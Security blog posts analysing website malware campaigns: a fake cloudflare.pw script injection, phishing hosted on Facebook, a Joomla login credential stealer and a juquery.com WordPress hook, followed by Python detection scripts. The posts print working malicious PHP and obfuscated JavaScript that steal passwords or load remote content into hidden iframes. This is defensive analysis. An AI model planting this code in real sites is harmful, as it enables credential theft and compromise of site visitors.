Fake cloudflare injection

Seeing malicious campaigns using domain names that resemble big market players is not news anymore. This time I'll talk about the new redirects of cloudflare.pw.

The domain, registered in 2017, has been used as a doorway to other suspicious content since then.

But this time it looks like they want to leverage the SSL adoption rush to hide the infection, since the script is loading content from https://*.contentssl.com.

The attackers are not only infecting files, but they also seem to be exploiting SQL injection vulnerabilities to add the following JavaScript to the database:

<script id="lg210a" src="https://cloudflare.pw/cdn/statslg30.js" type="text/javascript"></script>

The script id and the remote JavaScript file called can change. The file can be statslg30.js, statslg50.js or statslelivros20.js. All those variations load similar JS; the only difference is the final host, which always stays on the contentssl.com domain.

We also found fake jQuery scripts injected on infected sites, so if you see any of those entries on your site, perform a full check on it.

Using Google and Facebook to aid on distribution

Every now and then I check my spam mailbox for interesting malware (yes, I receive a lot of phishing messages and alerts that my payments are overdue), but most of the time it is more of the same: effortless malware and poorly written messages that are not fun to analyze.

Today I was bored (that time of the year that you need to write tons of reports, sorry boss…) and I decided to follow the trail of some of those links on the messages I got. And the first one was a "pleasant" surprise.

Usually I'd start by checking the message origin and writing about how it was sent and what was used to get control of the site, but this time I'll write about another aspect. (If you are wondering, it is a WordPress site with a vulnerable revslider in the site's theme that allowed the attacker to gain privileged access to the site.)

For those not fluent in Brazilian Portuguese, this message says that I have a payment overdue and that a new "boleto" (a common barcode payment method in Brazil) is attached. The interesting part is that they refer to me by my personal email alias and not my full name; however, they got my CPF (Brazil's equivalent of a Social Security Number) right, which is probably related to some leaked data (not that uncommon here).

Everything in this message is clickable, and all of the links send you to the same Google shortened URL, which resolves to Facebook's fbsbx.com domain, the domain Facebook uses to store attachments shared in chats and groups.

It is pretty interesting that they rely on such services to "host" their files instead of using another hacked site to store the malware. I monitored this file and, although the link was set to expire on Fri, 22 Dec 2017 16:15:47 GMT, it was taken down less than 24h after I received the scam email, probably by a Facebook malware scanning process.

Joomla password stealer

As we know, one of the main objectives after a successful attack is to maintain access to the compromised server for as long as possible. Today we found this simple but effective password stealer for Joomla.

// Appended to the Joomla login model: every login attempt is logged with a timestamp,
// the client IP and the plaintext username/password taken from the $credentials array.
$fh = fopen("components/com_login/models/login.txt", 'a');
date_default_timezone_set("America/Chicago");
fwrite($fh,date('m/d/Y H:i:s', time())." $_SERVER[REMOTE_ADDR] [$credentials[username]:$credentials[password]]\n");
fclose($fh);

It was injected into /administrator/components/com_login/models/login.php. The code just captures the $credentials array (username and password, to be more specific) and writes it to a login.txt file that was accessible from the internet.

To make things even easier for the attacker, it writes the date and time of the capture in the Chicago timezone (so, is the attacker in Chicago?).
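As an added example (not Sucuri's code, nor Joomla's), here is a small Python check for this kind of tampering: it compares core files against a manifest of known-good SHA-256 hashes and, in any file that changed, points at the lines that pass the $credentials array to a file, mail or network sink. The manifest, the file paths and the sample file contents are constructed for the example.

```python
import hashlib
import re

# Sinks that would carry a credential out of the process: a file, the error log, mail or a cURL request.
SINKS = re.compile(r"\b(fwrite|fputs|file_put_contents|error_log|mail|curl_setopt)\s*\(")

def find_credential_sinks(php_source):
    """(line_no, stripped line) for every line that passes $credentials to one of SINKS."""
    return [(no, line.strip()) for no, line in enumerate(php_source.splitlines(), 1)
            if "$credentials" in line and SINKS.search(line)]

def modified_files(manifest, read_file):
    """manifest: {path: expected sha256 hex}; read_file(path) -> bytes.
    Returns the paths whose current contents no longer match the manifest."""
    return [path for path, digest in manifest.items()
            if hashlib.sha256(read_file(path)).hexdigest() != digest]

def audit(manifest, files):
    """files: {path: bytes}. Report changed core files and the credential sinks found in them.
    A missing file hashes as empty, so a deleted core file is reported as modified too."""
    changed = modified_files(manifest, lambda p: files.get(p, b""))
    return changed, {p: find_credential_sinks(files.get(p, b"").decode("utf-8", "replace"))
                     for p in changed}

# Constructed sample: a stand-in for the shipped login model, and the same file with the
# stealer lines quoted in the post appended. The manifest hash is computed from the stand-in.
LOGIN_MODEL = "administrator/components/com_login/models/login.php"
PRISTINE = b"<?php\n// constructed stand-in for the shipped login model\n"
TAMPERED = PRISTINE + b"""$fh = fopen("components/com_login/models/login.txt", 'a');
date_default_timezone_set("America/Chicago");
fwrite($fh,date('m/d/Y H:i:s', time())." $_SERVER[REMOTE_ADDR] [$credentials[username]:$credentials[password]]\\n");
fclose($fh);
"""
MANIFEST = {LOGIN_MODEL: hashlib.sha256(PRISTINE).hexdigest()}

if __name__ == "__main__":
    changed, sinks = audit(MANIFEST, {LOGIN_MODEL: TAMPERED})
    for path in changed:
        print("modified:", path)
        for no, line in sinks[path]:
            print("  line %d: %s" % (no, line))
```

On a real install the manifest would be built from a pristine copy of the same Joomla release, and the sink scan is only a pointer to where to look, not proof on its own.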

New juquery.com injection

Today we found a malicious iframe that was being loaded from juquery.com (another fake jQuery site). It consisted of the following code hidden inside one of the plugins:

function browser_compability() {
    if (function_exists('curl_init')) {
        // URL defanged in the write-up ("httx", space before the host)
        $url = "httx://www. juquery.com/jquery-1.6.3.min.js";
        $ch = curl_init();
        $timeout = 10;
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
        $data = curl_exec($ch);
        curl_close($ch);
        // whatever the remote host returns is printed straight into <head>
        echo "$data";
    }
}
// runs on every page render, before any other output
add_action('wp_head', 'browser_compability');

It forces the site to contact juquery.com/jquery-1.6.3.min.js on every page load and to display whatever content it provides. It is currently displaying the following malicious payload (triggered by sitecheck):

<script type="text/javascript">var hs_frf=document.createElement("script");hs_frf.setAttribute("type","text/javascript");
var _0xa6df=["\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6A\x75\x71\x75\x65\x72..
var hs_fln=_0xa6df[0]+Math[_0xa6df[1]]();hs_frf.setAttribute("src",hs_fln);if (typeof hs_frf!="undefined");
document.getElementsByTagName("head")[0]. appendChild(hs_frf);</script>

This creates another iframe based on the payload hosted at httx://www.juquery.com/compability.php?0.09432658250443637:

var _0x2c3c=["\x69\x66\x72\x61\x6D\x65","\x63\x72\x65\x61\x74\x65...
var hs_ifr=document[_0x2c3c[1]](_0x2c3c[0]);hs_ifr[_0x2c3c[2]]=_0x2c3c[3];var hs_len=...
document[_0x2c3c[14]][_0x2c3c[13]] (hs_ifr);

which in turn decodes to the following iframe-loading script:

var hs_ifr = document['createElement']('iframe');
// the iframe id holds the final URL, hex encoded
hs_ifr['id'] = '687474703A2F2F6269742E6C792F31626C31736A66';
var hs_len = hs_ifr['id']['length'];
// decode two hex digits at a time, appending the characters after the hex string
for (var i = 0; i < hs_len; i += 2) {
    hs_ifr['id'] += String["fromCharCode"](parseInt(hs_ifr['id']['substr'](i, 2), 16));
};
// drop the hex prefix, keeping only the decoded URL
hs_ifr["id"] =  hs_ifr['id']['substr'](hs_len);
// zero-size hidden iframe pointing at the decoded URL
hs_ifr["style"]['display'] =  'none';
hs_ifr["style"]['width'] = 0;
hs_ifr["style"]['height'] = 0;
hs_ifr["src"] = hs_ifr['id'];
document["body"]["appendChild"] (hs_ifr);

It seems that fake jQuery sites are becoming more and more popular, and only jquery.com and jquery.org should be trusted.
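As an added example (not code from the original write-up), here is a Python scanner for the injections described in this post and in the cloudflare.pw one above: it pulls every script and iframe src out of a page and flags hosts that imitate jquery or cloudflare but live on a domain outside an allowlist. The allowlist, the brand list and the sample HTML are assumptions constructed for this example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
# Allowlisted library domains (assumption; the post only names jquery.com and jquery.org) and the brands imitated.
TRUSTED = {"jquery.com", "jquery.org", "cloudflare.com"}
BRANDS = ("jquery", "cloudflare")

class SrcCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.srcs = []          # src of every <script> and <iframe> tag
    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe"):
            self.srcs += [v for k, v in attrs if k == "src" and v]

def edit_distance(a, b):
    """Levenshtein distance: 'juquery' is one edit away from 'jquery'."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def classify_src(src):
    """None for local or allowlisted hosts, otherwise (src, reason)."""
    host = urlparse(src if "//" in src else "//" + src).hostname
    if not host:                                   # relative path, served by the site itself
        return None
    dom = ".".join(host.lower().split(".")[-2:])   # last two labels (assumption: no .co.uk-style suffix)
    if dom in TRUSTED:
        return None
    label = dom.split(".")[0]
    for brand in BRANDS:   # cloudflare.pw: same label, wrong TLD; juquery.com: one edit away
        if edit_distance(label, brand) <= 1:
            return (src, "lookalike of %s on untrusted domain %s" % (brand, dom))
    return (src, "external script host %s not in allowlist" % dom)

def scan_html(html):
    p = SrcCollector()
    p.feed(html)
    return [f for f in map(classify_src, p.srcs) if f]

# Constructed sample page: one legitimate include plus the two injected tags quoted in the post.
SAMPLE = """<html><head>
<script src="https://code.jquery.com/jquery-3.2.1.min.js"></script>
<script id="lg210a" src="https://cloudflare.pw/cdn/statslg30.js" type="text/javascript"></script>
<script src="https://www.juquery.com/jquery-1.6.3.min.js"></script>
</head><body></body></html>"""
```

Run scan_html over rendered pages and over database content (posts, options) since the post notes the tag was also injected through SQL injection.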